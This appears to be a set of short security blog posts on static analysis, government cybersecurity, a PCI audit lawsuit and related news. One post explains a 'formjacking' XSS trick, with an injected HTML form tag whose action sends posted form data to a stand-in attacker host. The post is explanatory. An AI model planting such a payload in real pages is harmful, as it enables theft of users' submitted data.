Great post to bookmark…this guy has a great list of sites out there that you can practice on.
http://securitythoughts.wordpress.com/2010/03/22/vulnerable-web-applications-for-learning/
Hack away.
So says an article over at networkworl.com. The crazy part is that number doesn’t include the attacks that go unnoticed. The DoD, as well as the rest of the world, is still behind the curve on detecting application attacks. I’m betting the numbers in this report should be much large.
On the Daily Dave mailing list there’s an interesting discussion about the value of static analysis. For those unaware of what static analysis is, static analysis is analyzing source code to find potential vulnerabilities. Like every technology, static analysis has it’s pros and cons. I don’t actually subscribe to the mail list (I only use RSS), so I’m going to write a little about my views on static analysis.
Pros
In the security world, the big fight is between static versus dynamic analysis. By dynamic, most people talk about penetration testing. The results from automated penetration tools usually contain low amounts of false positives, but your test is dependant on the tests ran by the tool. Pen-testing tools can and do miss vulnerabilities. Static analysis on the other scans ALL code. If there are vulnerabilities in the corners of your application that are typically not used, then static analysis has a higher probability of finding these vulnerabilities. In addition to finding obscure vulnerabilities, static analysis can also find more categories of vulnerabilities. Automated pen-test tools are limited because they can only see http responses. Static analysis tools can apply rules that are more focused on your development platforms.
Cons
The biggest argument against static analysis is it produces too many false positives. The common misconception here is that the tool is not saying “this is vulnerable”, the tool is actually saying “this is potentially vulnerable and needs to be audited to be sure”. Yes this creates a lot of work, but this argument really only applies to first time scans. Most of the major static analysis applications are rule based and give better results over time. After the initial triage, you suppress false positives and create custom rules to make the scan more context specific. For example, on the mailing list someone referred to static analysis tools producing false positives on custom memory management libraries. This is true, out of the box most scanners are going to flag this because they don’t know what the library does and want human eyes to verify. If you’re using Fortify SCA, you can write a custom rule to eliminate those false positives in the future. Because I’m a Fortify consultant, I know that the more you tailor our static analysis software to your application the better your results set. Static analysis shouldn’t be a one shot scan, it should be used continually throughout development and testing.
Conclusion
In the end, it’s not static analysis versus dynamic analysis. In reality, you should be using BOTH. Static analysis is going to give you a sense of how secure you code is. Penetration testing is going to find easily exploitable vulnerabilities. If you are concerned about false positives with static analysis, check out Fortify Program Trace Analyzer (PTA). PTA does static analysis automatically as you are doing functional testing. The results are extremely conservative. If PTA finds a vulnerability, you can usually take it to the bank.
AP is reporting that the Treasury Department, Secret Service, and “other” agencies were the victim of a Denial of Service attack over the 4th of July weekend. The South Korean government was also attacked, fueling speculation that the attack came from North Korea.
Is North Korea getting smart? Even though they are making advances in their missile technology, they would still get spanked if they went to war with pretty much any of the major nations. In cyberspace though, they could rival the abilities of the major nations.
Even with a small group of hackers, North Korea could plan massive attacks against pretty much anyone they want. Imagine them developing or purchasing a botnet, then using this botnet to launch a Denial of Service attack. These attacks are nearly impossible to block and it would be difficult to trace the attack back to North Korea.
Given the success of this attack, I would expect to see more of this from North Korea in the future. This further underscores the importance of the DoD cyberspace initiatives.
Update: Plot Thickens
There’s more info out now that says this could be a botnet and that some South Koreans are being hit with a virus. The attack is also ongoing…this should be interesting.
I read an interesting question this morning concerning what to teach developers. Should organizations spend time teaching developers hacking techniques or writing secure software? If both, how should they mix it up?
I’m happy to hear questions like this because it’s putting the focus where it needs to be: on developers. For far too long security has been focused on the network. I can’t remember where the statistic came from, but I think ~75% of breaches last year were application based. Training developers to stop vulnerabilities early in the SDLC is the best way of shrinking that percentage.
Teaching developers about hacking techniques is important. I believe Sun Tzu said “know thy enemy” and that was hundreds of years ago. With that being said, developers do not need to know everything about hacking techniques. If an individual developer is interested in software security, encourage them to learn more. This type of developer is referred to as a “satellite” in Building Security In Maturity Model (BIMM). Satellites can be extremely useful in raising the awareness of software security and sharing ways to stop vulnerabilities. In BIMM, they are a crucial part of the success of the Software Security Group (SSG).
Every developer should have a crash course in software security covering the consequences of writing insecure software and the most common attacks. I think the focus should be on writing better software; specifically writing reusable software that emphasizes security. Keeping developers trained on writing secure software is difficult, so its better to take them out of the loop. Try to break your applications up into pieces and use secure frameworks to move information between the layers. This is a much better approach than relying on every developer to know how to prevent security vulnerabilities.
The buzz around the cyber security community this week is a court case where a bank has filed suit against a audit firm for damages from a breach. I guess this was just a matter of time before banks began blaming someone else for their lack of security, but this is an interesting case that could have huge consequences.
The auditor in question, Savvis, was responsible for the audit of CardSystems. For those unaware, the CardSystems was one of the largest data breaches in history. Savvis certified that CardSystems was CISP (the precursor to PCI) compliant. As a result Merrick lost millions in fraud claims and replacing cards.
Do we have companies out there giving out PCI compliance without completely doing an audit? Can companies purchase compliance instead of changing their security practices? If this is the case, the whole system breaks down. The credit card companies and consumers rely on these audits to ensure their data is safe.
The other part to this is that no matter how good the auditor, its not common for vulnerabilities to slip through the cracks. I can speak from experience, getting the entire picture when doing an audit is difficult – especially if the company is not cooperative. Companies can look compliant on paper and during an inspection, but revert to insecure practices after the audit. This case could set a dangerous precedent for auditors. I can see the prices of audits going up exponentially to pay for the errors and omissions insurance!
Here’s an article stating that Microsoft has added memcopy to the list of naughty functions. This is really not a surprise in my opinion. For those of you who do not know why this is bad, memcopy copies data from one memory location to another. The problem is that it does not check the size of the receiving location to make sure there is enough room. Over the years, this has caused many vulnerabilities. As any good C/C++ developer knows, good memory management is crucial.
Just finished reading a blog over over at Digital Underground saying that Bruce Schneier says we don’t need a cyber czar. I couldn’t disagree with Mr. Schneier more! His criticism is:
"Really what I think is it shouldn’t be anybody. We do better without a top-down hierarchy. Our economic and political systems work best when there isn’t a dictator in charge, when there isn’t one organization in charge. My feeling is there shouldn’t be one organization in charge. Not only shouldn’t it be the NSA, it shouldn’t be anybody."
I believe in federalism, but I don’t think that will work with cyber security. The problem isn’t with a central authority like a cyber czar. The problem is the lack of mandate to make the government networks/applications secure. In my experience, people are more worried about security taking too long to implement and getting blamed for vulnerabilities. If Obama appointed a cyber czar and at the same time signed an executive order mandating that all government network/applications meet a central standard in a reasonable amount of time, our cyber readiness would be much better. That mandate couldn’t be ignored…
In the comments of the above post, one topic being discussed is that IT workers should be certified like engineers or architects. This is an interesting concept, but I’m skeptical of how much this will help. I know of many projects that were certified by a Professional Engineer (PE) that had design issues. PEs are still human…
Just read a cool post over at omg.wtf.bbq about a new attack called “formjacking”. Not sure about the attack name, but this is pretty neat. In FireFox 3 and IE7, self contained XHTML tags provide a way to exploit a XSS vulnerability and alter the action associated with a form tag. I’ve tested this out and it also works with Google Chrome, so the same goes for the other WebKit based browsers like Safari.
The gist is that if you can insert a self contained form tag, the browser will ignore the other form tags. Let’s say that you have the following code:
<form action="good.php" method="post"> <input type="text" name="test" id="test"></input> <input type="Submit" value="Submit"> </form>
If you can insert a self enclosed form tag:
<form action="http://evilhaxor.com/pwned" method="post" /> <form action="good.php" method="post"> <input type="text" name="test" id="test"></input> <input type="Submit" value="Submit"> </form>
Notice the forward slash at the end of the tag? The second form tag will be ignored and the post data will be sent to the inserted action.
The FAA has performed a security assessment of 70 of their web applications and found a large number of vulnerabilities. This doesn’t come as much of a surprise because most government agencies have not cracked down on software security. Besides the vulnerabilities, there are two things that bother me:
1. No Static Analysis – In the methodology section of the memo, it looks like KPMG only used penetration testing for this assessment. I’m not looking to start the typical static versus dynamic testing debate, but I was surprised that static analysis was not a component of this assessment. Automated penetration testing relies on the tool being used to find the vulnerabilities. Depending on the application, this type of testing could miss some critical vulnerabilities. Static analysis provides deeper analysis and can find vulnerabilities not detected by penetration testing tools. Not to mention, using static analysis early in the SDLC will decrease these vulnerabilities before they are released.
2. Separate Standards – In the memo, the writer mentions that the FAA uses “DOT Secure Web Application Standards”. The DoD has their standards, the DoT has their standards, NIST has standards, NSA has standards, etc. There really should be a standard that is applied to all agencies with a mandate from the President. Cybersecurity affects all agencies and we should all be on the same page.
It seems that Obama is taking a stand on cyber security and I hope they take this the right way.